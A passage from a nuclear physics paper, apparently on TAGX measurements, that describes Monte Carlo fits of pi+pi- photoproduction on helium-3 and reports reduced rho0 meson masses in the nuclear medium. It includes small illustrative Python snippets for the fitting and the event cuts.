(Section~\ref{sec:pcs}), including background and $\rho^0$ production
channels with the nominal m$_{\rho^0}$=770 MeV/c$^2$ mass, are
combined. The twelve spectra of each process are adjusted with a
common strength parameter within each of the four $\Delta$E$_\gamma$
bins before being added together. Subsequently, all twelve simulated
spectra are fitted simultaneously to the corresponding experimental
ones, yielding the nine strength parameters independently for each
$\Delta$E$_\gamma$ bin. From the latter, and the spectrometer
acceptances, total cross sections are extracted for each of the nine
production processes, and compared with independently established
ones. Adjustments to the starting values and fitting constraints are
made in iterative steps until satisfactory agreement is reached.
\item The procedure is repeated for all eleven production channels,
including the addition of two more processes (Section~\ref{sec:pcs})
with a modified $\rho^0$ mass m$^*_{\rho^0}$ in the range 500-725
MeV/c$^2$, but common for both the ${^3}He$ and breakup $ppn$ final
states. The $\rho^0$ mass corresponding to the best fit for each
$\Delta$E$_\gamma$ bin is quoted in this report as the medium-modified
m$^*_{\rho^0}$ mass (Section~\ref{sec:mmm}).
\item Exploratory fits are attempted, decoupling the ${^3}He$ and breakup
$ppn$ final states with respect to m$^*_{\rho^0}$, as well as
modifying the width $\Gamma^*_{\rho^0}$ (Section~\ref{sec:int}).
\end{itemize}
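At its core, this algorithm is a template fit: each simulated spectrum enters with one strength parameter per process, and the strengths are adjusted until the weighted sum of templates matches the data. The toy below, with three invented ``processes'' and a single noiseless spectrum, is a sketch only; the actual analysis minimizes a $\chi^2$ over twelve spectra with eleven channels per energy bin.

```python
import numpy as np

# Toy templates: simulated spectra of three "processes" over five bins;
# templates and true strengths are invented for illustration.
templates = np.array([
    [8.0, 6.0, 4.0, 2.0, 1.0],   # background-like channel
    [1.0, 3.0, 6.0, 3.0, 1.0],   # resonance-like channel
    [2.0, 2.0, 2.0, 2.0, 2.0],   # phase-space-like channel
])
strengths_true = np.array([1.5, 2.0, 0.5])
data = strengths_true @ templates          # noiseless pseudo-data

def chi2(strengths):
    """Goodness of fit between the data and the weighted template sum."""
    model = strengths @ templates
    return float(np.sum((data - model) ** 2))

# For this linear toy a least-squares solve recovers the strengths
strengths_fit, *_ = np.linalg.lstsq(templates.T, data, rcond=None)
```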
The principal aspects of this algorithm are elaborated below.
\subsection{Production channels}
\label{sec:pcs}
Several mechanisms are known to contribute to $\pi^+\pi^-$
photoproduction. Recent experiments for photon energies between 450
and 800 MeV at MAMI, using the large-acceptance spectrometer DAPHNE and
high-intensity tagged photon beams, and in the range 1 - 2.03 GeV with
the SAPHIR detector at ELSA \cite{saphir1}, have provided accurate
measurements of the reaction $\gamma p \rightarrow \pi^+\pi^- p$
\cite{saphir2,mami1,mami2}. These have motivated several theoretical
models, which concur in their interpretation of the data as
$\pi^+\pi^-$ photoproduction predominantly through the
$\pi\Delta(1232) \rightarrow \pi^+\pi^- N$, and the $N^*(1520)
\rightarrow \pi\Delta \rightarrow \pi^+\pi^- N$ channels
\cite{ppp1,ppp2,ppp3}. In the nuclear medium, the propagators of baryonic
resonances require renormalization, and, in addition, many-body
effects caused by pion rescattering (FSI) are known to interfere with
the lowest-order reaction mechanism of two-pion photoproduction on the
nucleon \cite{ssk}. These medium modifications affect both the
strength and the peak position of the cross-section spectra for the
various interfering channels, relative to the corresponding processes
on a free nucleon. Nonetheless, the $\Delta$(1232) and N$^*$(1520)
resonances remain the leading channels in photon-induced reactions in
the nuclear medium, as has recently been verified by total
photoabsorption cross-section measurements on nuclei
\cite{bianchi}. In the latter, substantial contributions were also
attributed to the nucleonic excitations P$_{11}$(1440) and
S$_{11}$(1535), primarily, which largely overlap with the N$^*$(1520)
resonance in medium-modified mass and width.
The double-$\Delta$ is another channel that has been verified in
photoabsorption measurements on the deuteron \cite{dd1,dd2}, a process
that has also been modelled theoretically \cite{on}. The photon is
absorbed on two nucleons, exciting $\Delta$(1232) resonances, in the
reaction $\gamma NN \rightarrow \Delta\Delta$, which subsequently
decay to produce $\pi^+\pi^-$ pairs.
In addition, three-pion $\pi^+\pi^-\pi^0$ production, associated with
${^3}He$ disintegration, is kinematically feasible in the energy range
probed by the present experiment. However, the limited out-of-plane
detector acceptance, coupled with appropriate missing-mass cuts,
minimizes the contributions of this mechanism. The experimental
measurements available are sparse for this process in the energy
regime of interest \cite{saphir2,saphir3,ppp}.
Other possible contributions to the background $\pi^+\pi^-$ count,
which, however, were not found to improve the quality of the fit and
are presently not included in the simulations, may come from
non-resonant three-, four-, and five-body phase space, corresponding
to the ${^3}He$ remaining intact, or breaking-up into $dp$ and $ppn$
respectively. These multi-body phase-space processes are governed
solely by energy and momentum conservation, each with a constant
transition matrix element \cite{sod}, and, loosely speaking,
accommodate in an average sense all the remaining possible production
channels which are too weak to be individually identified.
The contributions of the mechanisms discussed so far have been
previously considered in MC simulations, in connection with TAGX
$\pi^+\pi^-$ photoproduction data \cite{watts,lolos,hub}. In
Ref.~\cite{lolos} in particular, where $\pi^+\pi^-$ photoproduction
via the $\rho^0$ channel was first considered, the background
processes
$$
\gamma + ^3He \rightarrow \left\{ \begin{array}{l} {\left.
\begin{array}{l}
{i)\ \ \ \Delta\pi(NN)_{sp}}\\
{ii)\ \ N^*(1520)(NN)_{sp} \rightarrow \Delta(1232)\pi(NN)_{sp}}\\
{iii)\ N^*(1520)\pi(NN)_{sp}}\\
{iv)\ \ \Delta\Delta N_{sp}} \end{array} \right\} \rightarrow ppn\pi^+\pi^-}\\
\ {v)\ \ \ ppn\pi^+\pi^-\pi^0}
\end{array} \right. \,
$$
were included in simulations of non-$\rho^0$ $\pi^+\pi^-$
contributions, as well as final-state interactions (FSI) following the
$\rho^0$ decay (see process $ix)$ below). The index $sp$ signifies
spectator nucleons. The empirical values from Ref.~\cite{bianchi} were
used for the $\Delta$(1232) mass and width and for the N$^*$(1520)
mass, but the fit improved with the N$^*$(1520) width doubled relative
to Ref.~\cite{bianchi}. This {\it ad hoc} increase effectively
incorporates the near-by resonances P$_{11}$(1440) and S$_{11}$(1535),
which largely overlap with the N$^*$(1520), but cannot be resolved
within the sensitivity of the data. Alternate fits were performed with
the N$^*$(1520) replaced by the Roper N$^*$(1440) and including
five-body phase space. The two methods yield comparable masses for the
$\rho^0$, but the former is preferred as it results in a better fit.
Additional improvements in the fitting procedure, relative to the
analysis of Refs.~\cite{watts,lolos,hub}, include the modification of
the MC generators to account for the angular momentum of all $\rho^0
\rightarrow \pi^+\pi^-$ and intermediate $\Delta$-resonance
channels. Furthermore, motivated by recent $\pi\pi$ phase-shift
analyses which increasingly show evidence of s-wave contributions from
the $\sigma$ meson, the quasifree $\sigma$-decay channel
$$
vi)\ \ \ \gamma + {^3}He \rightarrow \sigma ppn \rightarrow
\pi^+\pi^- \,{^3}He
$$
has been added, with the $\sigma$ mass and width parameters from
Ref.~\cite{sigma}.
Last, $\rho^0 \rightarrow \pi^+\pi^-$ photoproduction has been
simulated by means of five distinct generators, namely
$$
\gamma + {^3}He \rightarrow \left\{ \begin{array}{l}
{\left. \begin{array}{l}
{vii)\ \ \rho^0 + {^3}He \rightarrow \pi^+\pi^- \,{^3}He}\\
{viii)\ \rho^0ppn \rightarrow \pi^+\pi^-ppn}\\
{ix)\ \ \ \rho^0ppn \rightarrow \pi^+\pi^-ppn + (FSI)}
\end{array} \right\} \ \ \ \ \ m_{\rho^0}\,=\,770\, MeV/c^2}\\
{\left. \begin{array}{l}
{x)\ \ \ \ \rho^0 + {^3}He \rightarrow \pi^+\pi^- \,{^3}He}\\
{xi)\ \ \ \rho^0ppn \rightarrow \pi^+\pi^-ppn}
\end{array} \right\} \ \ 500\, MeV/c^2\, \le m^*_{\rho^0} \le \,725\, MeV/c^2}
\end{array} \right.
$$ where channels $vii)$-$ix)$ correspond to $\rho^0$ decay outside
the nuclear medium, and channels $x)$-$xi)$ to decay inside it, the
latter probing the medium effect on the $\rho^0$ mass. The breakup channels
have the reaction taking place on a single nucleon, subject to its
Fermi motion, with the remaining two nucleons as spectators. Final
state $\pi N$ interaction (FSI) with one of the two spectator nucleons
is included in channel $ix)$.
\subsection{Fitting procedure}
\label{sec:fp}
In modelling $\pi^+\pi^-$ photoproduction on nuclei, the distributions
of five kinematical observables (Section~\ref{sec:obs}) were
simultaneously fitted to the data in Refs.~\cite{watts,lolos,hub}. These are
$$
\begin{array}{l}
{1.\ \ {\rm the\ dipion\ invariant\ mass\ }m_{\pi^+\pi^-}}\\
{2.\ \ {\rm the\ laboratory\ production\ angle\ of\ the\ dipion\ system\ }
\Theta_{IM}}\\
{3.\ \ {\rm the\ missing\ mass\ }m_{miss}}\\
{4.\ \ {\rm the\ missing\ momentum\ }p_{miss}}\\
{5.\ \ {\rm the\ }\pi^+ -\pi^- {\rm laboratory\ opening\ angle\ }
\vartheta_{\pi^+\pi^-}}
\end{array}
$$
to which one additional kinematical observable has presently been added
(Section~\ref{sec:le1}), namely
$$
6.\ \ {\rm the\ } \pi^+ {\rm production\ angle\ in\ the\ dipion\ rest\ frame\ }
cos\theta^*_{\pi^+}\ .
$$
Moreover, in Ref.~\cite{watts} it was determined that dividing the
data sample into $\Delta E_\gamma$ = 80 MeV bins provided the optimal
compromise between the presumed constancy of the reaction matrix
elements, implicit in the MC simulations which only depend on the
kinematics, and the requirement of sufficient statistics. The $\Delta
E_\gamma$ partitioning of the data is necessary in order to account
for the varying energy dependence of the $\pi^+\pi^-$ cross sections
from each of the individual production mechanisms. The 80~MeV binning
in E$_\gamma$ has been retained, resulting in four sectors of the data
sample from 800 to 1120 MeV, to be referred to by their respective
central E$_\gamma$ values (840, 920, 1000, and 1080 $\pm$40~MeV).
The addition of the cos$\theta^*_{\pi^+}$ distribution, though not
noticeably affecting the overall quality of the fit, nonetheless
provides an additional physical constraint which aids the MC fitting
algorithm to converge to a more realistic solution. In particular,
this kinematical observable uniquely captures a characteristic feature
of the contributing mechanisms, which may be classified into three
types according to their respective dependence on
cos$\theta^*_{\pi^+}$ (Fig.~\ref{figacc}):
\begin{itemize}
\item The channel of interest, diffractive $\rho^0\rightarrow
\pi^+\pi^-$, is unique in producing two p-wave correlated pions. The
spectrometer response to this mechanism is consistent with the $J=1$
dependence, and the deviation from the anticipated
cos$^2\theta^*_{\pi^+}$ distribution towards $\sim \pm$1 reflects the
acceptance cut, stemming from the kinematical conditions, set-up
geometry, and the two-pion detection requirement (compare the solid
curve of Fig.~\ref{figacc} with Figs.~\ref{figcos}b,c).
\item The background hadronic channels $i)-iv)$ of
Section~\ref{sec:pcs} produce two uncorrelated pions at two or more
reaction vertices. The angular correlations of these pions are
averaged out over 4$\pi$ sr in simulations, resulting in featureless
cos$\theta^*_{\pi^+}$ spectra. The spectrometer geometry, however,
suppresses the pion acceptance away from cos$\theta^*_{\pi^+}$=0 (see
e.g. the dashed curve of Fig.~\ref{figacc} for the single-$\Delta$
production channel). This is a consequence of the fact that channels
$i)-iv)$ involve the decay of intermediate baryonic resonances,
accompanied by energetic nucleons.
\item Three-pion production and the quasi-elastic $\sigma$ process,
$v)$ and $vi)$ of Section~\ref{sec:pcs}, are characterized by
featureless cos$\theta^*_{\pi^+}$ acceptances, as no energetic
nucleons are emitted (dotted curve of Fig.~\ref{figacc}).
\end{itemize}
The combination of improvements relative to the analysis of
Ref.~\cite{lolos}, namely, accounting for the angular momentum in the
$\Delta$ and $\rho^0$ channels, and imposing additional physical
constraints via the new kinematical observable cos$\theta^*_{\pi^+}$,
resulted in a more accurate treatment of the process-dependent
spectrometer acceptances.
The data have been subjected to two additional cuts, one of which
enhances the $\rho^0$ relative to the background channels, and the
other facilitates the separation of the bound ${^3}He$ from the
breakup $ppn$ final states. The former is a $\pi^+\pi^-$ opening-angle
cut determined from MC simulations, namely 70$^\circ \le
\vartheta_{\pi^+\pi^-} \le$ 180$^\circ$, eliminating two-pion events
that could not have been produced back-to-back from the $\rho^0$ decay
(Fig.~\ref{figcuts}a). This cut is most effective at the higher end of
photon energies covered by the experiment, where the $\rho^0$
identification is hampered by a $\rho^0$-to-background ratio that
deteriorates with increasing E$_\gamma$. The latter
cut (Fig.~\ref{figcuts}b) separates events with missing mass in the
proximity of the target mass $m_{{^3}He}\,\approx\,2.8\ GeV/c^2$
(i.e. $2700\ MeV/c^2 < m_{miss} < 2865\ MeV/c^2$), from those
associated with the breakup of the target nucleus to $ppn$ in the
final state ($2865\ MeV/c^2 < m_{miss} < 3050\ MeV/c^2$). The
combination of the two types of cuts is applied to three of the
kinematical observables, resulting in six additional spectra, besides
the unselected $\pi^+\pi^-$ distributions 1-6 enumerated
earlier. These are:
$$
\begin{array}{l}
{\left. \begin{array}{l}
{7.\ \ m_{\pi^+\pi^-}}\\
{8.\ \ p_{miss}}\\
{9.\ \ cos\theta^*_{\pi^+}}
\end{array} \right\} \ \ \rho^0- {\rm enhanced\ low\ missing-mass\ data}}\\
{ }\\
{\left. \begin{array}{l}
{10.\ m_{\pi^+\pi^-}}\\
{11.\ p_{miss}}\\
{12.\ cos\theta^*_{\pi^+}}
\end{array} \right\} \ \ \rho^0- {\rm enhanced\ high\ missing-mass\ data}}
\end{array}
$$
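Applied to an event list, the two cuts are simple window conditions. The toy events and field names below are invented for the sketch; the windows are those quoted in the text.

```python
# Toy event sample: pi+pi- opening angle (degrees) and missing mass
# (MeV/c^2) per event; values and field names are invented.
events = [
    {"open_deg": 150.0, "m_miss": 2800.0},
    {"open_deg": 45.0,  "m_miss": 2810.0},   # fails opening-angle cut
    {"open_deg": 120.0, "m_miss": 2950.0},
    {"open_deg": 95.0,  "m_miss": 3100.0},   # outside both mass windows
]

def rho0_enhanced(ev):
    """Opening-angle cut removing pairs too collinear to come from a
    back-to-back rho0 -> pi+pi- decay at a single vertex."""
    return 70.0 <= ev["open_deg"] <= 180.0

def low_missing_mass(ev):     # bound 3He final state
    return 2700.0 < ev["m_miss"] < 2865.0

def high_missing_mass(ev):    # ppn breakup final state
    return 2865.0 < ev["m_miss"] < 3050.0

# The rho0-enhanced low and high missing-mass samples (spectra 7-9, 10-12)
sample_low  = [ev for ev in events if rho0_enhanced(ev) and low_missing_mass(ev)]
sample_high = [ev for ev in events if rho0_enhanced(ev) and high_missing_mass(ev)]
```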
While the contributing $\rho^0$ photoproduction mechanisms may not be
experimentally distinguishable (Section~\ref{sec:intro}), the cuts aim
at partitioning the data into biased samples favoring processes which
are more prone to probing either the nuclear mean-field effect
(i.e. coherent and exclusive quasifree photoproduction via the
distributions 7-9), or a possible nucleonic effect (i.e. the breakup
quasifree channel via the spectra 10-12). The three kinematical
observables which were subjected to the cuts, namely, the dipion
invariant mass, missing momentum, and dipion-cm $\pi^+$
production angle, were selected empirically from the kinematical
observables 1-6 as more sensitive to the $\rho^0$ mass, and therefore
more susceptible to possible medium effects.
With a range of m$^*_{\rho^0}$ values, traversing the region 500-725
MeV/c$^2$, and each value kept common for the unselected, as well as
the ${^3}He$ and $ppn$ selected data, the twelve simulated spectra
were fitted simultaneously to the corresponding experimental ones, by
minimizing a standard $\chi^2$ function with the strengths of the
eleven individual processes $i)-xi)$ (Section~\ref{sec:pcs}) as the
fit parameters. The four $\Delta$E$_\gamma = 80$~MeV bins were fitted
independently. The optimal m$^*_{\rho^0}$ for each bin is that
corresponding to the minimum value of the $\chi^2$ function
(Section~\ref{sec:mmm}).
In summary, the MC fitting procedure satisfies the following requirements:
\begin{itemize}
\item The $\Delta$E$_\gamma$ = 80 MeV binning restricts the energy
dependence of the participating processes to the narrowest bin
possible without loss of sufficient statistics.
\item The six kinematical observables utilized in the fitting are
complementary, and account for different physical attributes of the
data sample. This imposes far more stringent constraints than an
analysis based on only the invariant mass distribution, as in the case
of the CERES data \cite{ceres}.
\item The simultaneous fitting of selected and unselected data aims at
isolating a strong signal from data samples most responsive to
possible $\rho^0$ mass modifications, while also incorporating in the
fit the bulk of $\pi^+\pi^-$ events produced in processes less
sensitive to such effects.
\end{itemize}
The outcome of this procedure is the medium-modified $\rho^0$ meson mass.
\section{RESULTS}
\label{sec:data}
\subsection{Quality of fit and uncertainties}
\label{sec:mmm}
Beyond the statistical and other experimental uncertainties which are
folded into the calibration and analysis of the measured $\pi^+\pi^-$
yields, additional sources of uncertainty are generated by the MC
simulations and fitting algorithm. i) The MC event generators depend
exclusively on kinematical parameters, neglecting other aspects of the
interaction. As an example, the channel $\gamma + {^3}He \rightarrow
(np)_{sp}\Delta\pi$ is modelled as $\gamma +{^3}He \rightarrow
(np)_{sp} \Delta^{++}\pi^-$, normalized by an isospin scaling factor
to account for the remaining hadronic charge states. This introduces
an uncertainty in the amplitude of this process; similar uncertainties
are also present in other background hadronic channels. ii) Independent
total cross-section measurements of the constituent reactions, serving
to anchor their relative strengths in the full $\pi^+\pi^-$ production
process, are sparse (e.g. the quasi-elastic $\sigma$ channel). The
strength for some of the individual channels was inferred from
indirect sources. iii) Additional quasifree channels and independent
measurements to fix their strength are required in order to extract
precision cross sections for the background hadronic channels from the
data, processes which merit attention on their own behalf. This may
become possible following the analysis of three charged-particle
events from TAGX experiments, currently in progress.
Despite the caveats above, the medium-modified $\rho^0$ masses
extracted from the MC fitting procedure have remained remarkably
stable with respect to variations of the strength parameters of the
constituent reactions, within each of the four $\Delta E_\gamma$
bins. This is all the more significant considering that the data are
fit simultaneously for twelve spectra of six kinematical
observables. In conjunction with the direct $J=1$ fingerprint
discussed earlier, the insensitivity of the fit, within physical
constraints, adds confidence to the premise that the medium-modified
$\rho^0$-meson masses extracted from the MC simulations reflect
genuine features of the data sample.
Following the procedure discussed in Section~\ref{sec:mc}, several MC
fits have been performed with m$^*_{\rho^0}$ taking on values from a
mesh in the range 500-725 MeV/c$^2$ (Fig.~\ref{figch2}). The steepness
of the $\chi^2$-vs-m$^*_{\rho^0}$ curve is indicative of the
sensitivity of the data sample to $\rho^0$ mass modifications, within
each of the four $\Delta E_\gamma$ bins. Using this as a qualitative
criterion, the fitting of the 840 and 920 MeV samples, and to a lesser
extent of the 1000 MeV sample, has converged to a ``best''
m$^*_{\rho^0}$, whereas the fit for the 1080 MeV bin is essentially
insensitive to variations of m$^*_{\rho^0}$ (Fig.~\ref{figch2}).
For each of the 840, 920, and 1000 MeV bins individually, the MC fits
(dark circles, triangles and squares respectively in
Fig.~\ref{figch2}) yield the best m$^*_{\rho^0}$ and an estimate of
its uncertainty. This is achieved as follows: a) The uncertainty
$\sigma_{\chi^2}$ is assumed common within each bin. This is justified
by the fact that both the data set and the reaction matrix elements
used by the MC algorithm are common within each bin. b) A polynomial
expansion of the MC $\chi^2$ about (m$^*_{\rho^0}$-m$_0$), with m$_0$
in the proximity of the apparent minimum, is assumed to describe well
the dependence of the former on the latter. Subsequently a new
${\chi'}^2$ minimization yields the order and the coefficients of the
polynomial. A third order polynomial gives the best result for the two
lower-energy bins, and it is also assumed to provide the best
description of the parent population for the 1000 MeV data
sample. This procedure also leads to conservative estimates for
$\sigma_{\chi^2}$, in particular 0.019, 0.013 and 0.017 for the 840,
920, and 1000 MeV bins, respectively. c) The polynomial coefficients
and $\sigma_{\chi^2}$ estimates are used to derive the optimal
m$^*_{\rho^0}$ and an estimate of its uncertainty for each bin. These
are:
\begin{itemize}
\item m$^*_{\rho^0}$ = 642$\pm$40 MeV/c$^2$, 800 MeV$\le$E$_\gamma$$\le$880 MeV
\item m$^*_{\rho^0}$ = 669$\pm$32 MeV/c$^2$, 880 MeV$\le$E$_\gamma$$\le$960 MeV
\item m$^*_{\rho^0}$ = 682$\pm$56 MeV/c$^2$, 960 MeV$\le$E$_\gamma$$\le$1040 MeV
\end{itemize}
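Step b) of this procedure amounts to fitting a cubic polynomial to the $\chi^2$-vs-m$^*_{\rho^0}$ mesh and locating its minimum. In the sketch below the mesh and $\chi^2$ values are invented, shaped like the valleys of Fig.~\ref{figch2}, with a minimum placed near 640 MeV/c$^2$.

```python
import numpy as np

# Invented chi2 values on a mesh of trial rho0 masses (MeV/c^2),
# shaped like a valley with its minimum near 640.
masses = np.array([500.0, 550.0, 600.0, 650.0, 700.0])
chi2 = np.array([2.2526, 1.6977, 1.3794, 1.3050, 1.4822])

# Third-order polynomial fit of chi2 about m0 near the apparent minimum
m0 = 640.0
poly = np.poly1d(np.polyfit(masses - m0, chi2, 3))

# Optimal m*: the real stationary point of the polynomial inside the
# scanned range with the lowest chi2
roots = poly.deriv().roots
roots = roots[np.isreal(roots)].real + m0
m_best = min((m for m in roots if 500.0 <= m <= 700.0),
             key=lambda m: poly(m - m0))
```

The quoted uncertainty then follows from the masses at which the fitted polynomial rises by $\sigma_{\chi^2}$ above its minimum.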
The improvement in the medium-modified over the unmodified $\rho^0$
mass fits is evident to varying degrees in all the fitted
spectra. The magnitude of the improvement is illustrated for the full
(unselected) data in the dipion invariant-mass, $\pi^+$-$\pi^-$
laboratory opening-angle, and missing-momentum distributions for the
840$\pm$40 MeV and 920$\pm$40 MeV bins, which are most affected by
modifications of the $\rho^0$ mass (Figs.~\ref{fig840},\ref{fig920}).
The dipion invariant mass spectra are not the most sensitive to
variations of the $\rho^0$ mass, among the twelve distributions of six
kinematical observables that were employed in the fit. This is seen,
for example, by comparing the improvement in the dipion invariant-mass
spectra, between the unmodified and modified mass, with that in the
opening-angle and missing-momentum spectra
(Figs.~\ref{fig840},\ref{fig920}), where the latter two observables
display a greater sensitivity. This
underlines the advantage of a fitting procedure that utilizes multiple
complementary kinematical observables as opposed to only the invariant
mass, thus capturing additional attributes of the physical process,
and resulting in a more realistic analysis.
\subsection{Discussion}
\label{sec:int}
The $J$=1 angular momentum signal, discussed in Section~\ref{sec:le1}
(Fig~\ref{figcos}), as well as the dipion invariant mass spectra from
the fit (e.g. Figs.~\ref{fig840}a,d for E$_\gamma$=840 MeV), would
appear to indicate medium-modified $\rho^0$ masses which are actually
{\it lower} than the values quoted earlier (e.g. compare
m$^*_{\rho^0}$=642$\pm$40 MeV/c$^2$ for the 840 MeV bin with the
centroid suggested by the dashed curve of Fig.~\ref{fig840}a). This
apparent discrepancy is misleading, and has its origin in a trivial
effective mass lowering driven by phase-space, most pronounced at
lower photon energies. This is due to the fact that, at low photon
energies, only the lower wing of the $\rho^0$ mass distribution is
kinematically accessible (e.g. Fig.~\ref{figims} for E$_\gamma$=840
MeV and the $\rho^0ppn$ final state). The shape and the centroid of
the mass distribution for the resulting $\rho^0$ mesons is primarily
dictated by the kinematics, and to a lesser extent by the spectrometer
acceptance for the particular $\rho^0$-producing process. This effect
is implicit in the MC generated $\rho^0$ spectra, and it is by no
means sufficient to account for a mass lowering of the order
explicitly observed in the experiment. This is manifest, for example,
in comparing the lower solid curves of Figs.~\ref{fig840}a,d - for
which $\rho^0$ production is dominated by the $ppn$ final state - with
the $J$=1 fingerprint of the $\rho^0$ in Fig.~\ref{figcos}. The loci
of the former curves, consistent with the mass distribution indicated
by the histogram of Fig.~\ref{figims}a for E$_\gamma$=840 MeV and the
nominal $\rho^0$ mass, are far too high to be compatible with
Fig.~\ref{figcos}, with a $\rho^0$ signal peaking in the range of
500-600 MeV/c$^2$. In contrast, the histogram of Fig.~\ref{figims}b
for a lowered $\rho^0$ mass, and the dashed curve in
Fig~\ref{fig840}a, are consistent.
Alternate fits were also attempted, to possibly discern additional
features from the 840 and 920 MeV bin samples. Decoupling the
exclusive ${^3}He$ from the breakup $ppn$ final states with respect to
m$^*_{\rho^0}$ yielded identical masses for the 920~MeV bin, and a
somewhat smaller mass for the latter relative to the former channel
for the 840~MeV bin. The resulting improvement in the quality of fit,
however, is within the uncertainty estimate of $\sigma_{\chi^2}$. Fits
were also performed with $\Gamma^*_{\rho^0}$ fixed to the predicted
width at half nuclear density extracted for ${^3}He$ from
Ref.~\cite{weise}, about double the free width $\Gamma_{\rho^0}$. A
sizeable improvement in $\chi^2$ was noted with the modified width for
any mass, compared with the free mass and width case. In all cases,
however, the $\chi^2$ is 5-10\% larger with $\Gamma^*_{\rho^0}$ than
with $\Gamma_{\rho^0}$. Moreover, the preferred m$^*_{\rho^0}$ is no
higher with the modified than with the free width. In summary, these
exploratory fits verify the preference for a reduced $\rho^0$ mass, but
are inconclusive, within the sensitivity of the data, as to whether a
width modification is {\it in addition} supported.
The absence of a conclusive $\rho^0$ mass-modification dependence from
the 1000 and 1080 MeV bins, in contrast to the strong signal from the
840 and 920 MeV bins, is telling as well. Whereas the former are more
prone to probing the exclusive channel, and therefore the nuclear
mean-field medium effect, the latter are deeper into the subthreshold
region, dominated by the breakup channel, and probe distances
shorter than the nucleonic radius. To illustrate the range of the
$\rho^0$ processes in different energy regions, we consider the mean
decay length $l_0$ of the $\rho^0$
\begin{eqnarray}
&&l_0 = \beta t_0={{p\hbar}\over{m_{\rho^0}\Gamma_{\rho^0}c}}\nonumber \\
&&\beta = {p\over{m_{\rho^0}\gamma c}}\nonumber \\
&&t_0 = \gamma \tau_0 = \gamma {\hbar\over\Gamma_{\rho^0}}\ ,
\label{dl0}
\end{eqnarray}
with the nominal mass $m_{\rho^0}$ and width $\Gamma_{\rho^0}$ for the
$\rho^0$ meson, in the rest frame of either the interacting nucleon,
or the ${^3}He$ nucleus, for the breakup or bound final state
(Fig.~\ref{figdl0}). At low photon energies (e.g. E$_\gamma$=840 MeV,
Fig.~\ref{figdl0}a) the $ppn$ channel dominates $\rho^0$
photoproduction. This is verified by the fact that the low
missing-mass selected data represent less than 10\% of the total
unselected events, whereas the high missing-mass selected data
contribute the great majority of the $\rho^0$ events and their
corresponding distributions are generally consistent with the full
(unselected) data. With the $\rho^0$ mesons produced on the nucleon,
and a mean decay length of under $0.5$ fm for a substantial portion of
them, there is a large overlap of the volume traversed before their
decay and the nucleonic volume. To the extent that the medium
modifications of the vector-meson properties depend on the density of
the surrounding nuclear matter, it is conceivable that the induced
medium effect be dominated by the large densities encountered in the
interior of the nucleon, and consequently be far more pronounced than
a medium effect induced by nuclear fringe densities. At higher photon
energies (e.g. E$_\gamma$=1 GeV, Fig.~\ref{figdl0}b), both the $ppn$
and ${^3}He$ final states contribute and the mean decay length
increases. Whereas nucleonic densities become increasingly
inaccessible, a large overlap of the volume traversed by the $\rho^0$
before its decay with the ${^3}He$ nucleus may still induce a weaker
nuclear medium effect. Moreover, the possibility of a medium-induced
increase in the width $\Gamma_{\rho^0}$ is in favor of shorter decay
lengths (Eq.~\ref{dl0}), and therefore further increases the
likelihood of accessing regions of large densities either in the
nucleon, or the nuclear core. The present results may therefore be
suggestive of a moderate medium effect in the realm of the nuclear
mean field at near-threshold photon energies, probing normal nuclear
densities, turning to a drastic reduction of the $\rho^0$ mass in the
deep subthreshold region, where the $\rho^0$ decay may be induced in
the proximity of the nucleon. These implications, however, need to be
further investigated and verified by higher precision and large solid
angle experiments \cite{sp}.
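The decay-length scale invoked in this discussion is easy to reproduce numerically. The following sketch (Python; the nominal values $m_{\rho^0}\simeq 770$ MeV/c$^2$ and $\Gamma_{\rho^0}\simeq 151$ MeV are assumed for illustration) evaluates Eq.~(\ref{dl0}) in natural units, confirming that a $\rho^0$ carrying a few hundred MeV/c of momentum decays within roughly half a fermi:

```python
# Mean decay length of Eq. (dl0): l0 = beta*c*t0 = p*(hbar c)/(m*Gamma),
# i.e. l0[fm] = p[MeV/c] * (hbar c)[MeV fm] / (m[MeV/c^2] * Gamma[MeV]).
HBARC = 197.327  # hbar*c in MeV*fm

def decay_length_fm(p, m=770.0, gamma=151.0):
    """Mean decay length (fm) of a resonance of mass m and width gamma
    carrying momentum p in the frame where the decay is observed."""
    return p * HBARC / (m * gamma)

for p in (300.0, 600.0, 1000.0):
    print(f"p = {p:6.0f} MeV/c  ->  l0 = {decay_length_fm(p):.2f} fm")
```

With these inputs one finds $l_0\approx 0.5$ fm at $p=300$ MeV/c and $l_0\approx 1.7$ fm at $p=1$ GeV/c, consistent with the scales discussed above.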
\section{Conclusions}
\label{sec:concl}
In summary, the kinematics and final state of the
${^3}He$($\gamma$,$\pi^+\pi^-$)X reaction have been studied with the
TAGX spectrometer and a tagged photon beam in the subthreshold
$\rho^0$ photoproduction region. The bound ${^3}He$ and breakup $ppn$
components of the $\rho^0$ channel have been investigated, aiming at
the distinction between a nuclear and a possible nucleonic medium
effect on the $\rho^0$ mass. The $\rho^0$ channel has been aided by
the inherent selectivity of the TAGX spectrometer to coplanar
$\pi^+\pi^-$ events, and by the choice of ${^3}He$ as a target with
minimal FSI effects without suppression of the $\rho^0$ amplitude. In
any case, the size of the target has little effect in the subthreshold
region. The $J=1$ fingerprint of the $\rho^0$ has been observed in the
dipion invariant mass region 500-700 MeV/c$^2$, pointing to a
substantial mass reduction beyond the trivial, phase-space-governed
apparent lowering. This has been verified by MC simulations, incorporating the
exclusive and breakup $\rho^0$ channels, the latter both with and
without FSI, as well as background hadronic channels and s-wave
correlations. The extracted $\rho^0$ medium-modified masses,
642$\pm$40 MeV/c$^2$, 669$\pm$32 MeV/c$^2$, and 682$\pm$56 MeV/c$^2$
for the 840, 920, and 1000 MeV data bins, suggest a strong medium
effect in the deep subthreshold region, requiring large densities that
are incompatible with a nucleus as light as ${^3}He$, but that are
more consistent with the probing of the nucleonic volume. The pattern
of decreasing sensitivity with increasing photon energy, with the 1080
MeV bin showing no evidence of a $\rho^0$ mass-modification signal,
hints at a moderate mean-field nuclear effect at near-threshold
energies. The simulations are inconclusive regarding a medium-modified
$\rho^0$ width.
Further analysis currently in progress for photoproduction on heavier
targets (${^4}He$,${^{12}}C$) and for background contributions
(e.g. the $\Delta\pi$ channel) from TAGX experiments, as well as
future experiments planned for TJNAF \cite{sp}, may more accurately
isolate the $\rho^0 \rightarrow \pi^+\pi^-$ channel from the
background processes, and shed light on the nature of the medium
modifications on light vector-meson properties at the interface of
hadronic and quark matter.
The authors wish to thank H. Okuno and the staff of INS-ES for their
considerable help with the experiment. Furthermore, the authors
acknowledge the very insightful discussions with P. Guichon, M.
Ericson, A. Thomas, and A. Williams during the Workshop on Hadrons in
Dense Matter (Adelaide, March 10-28, 1997), as well as the discussions
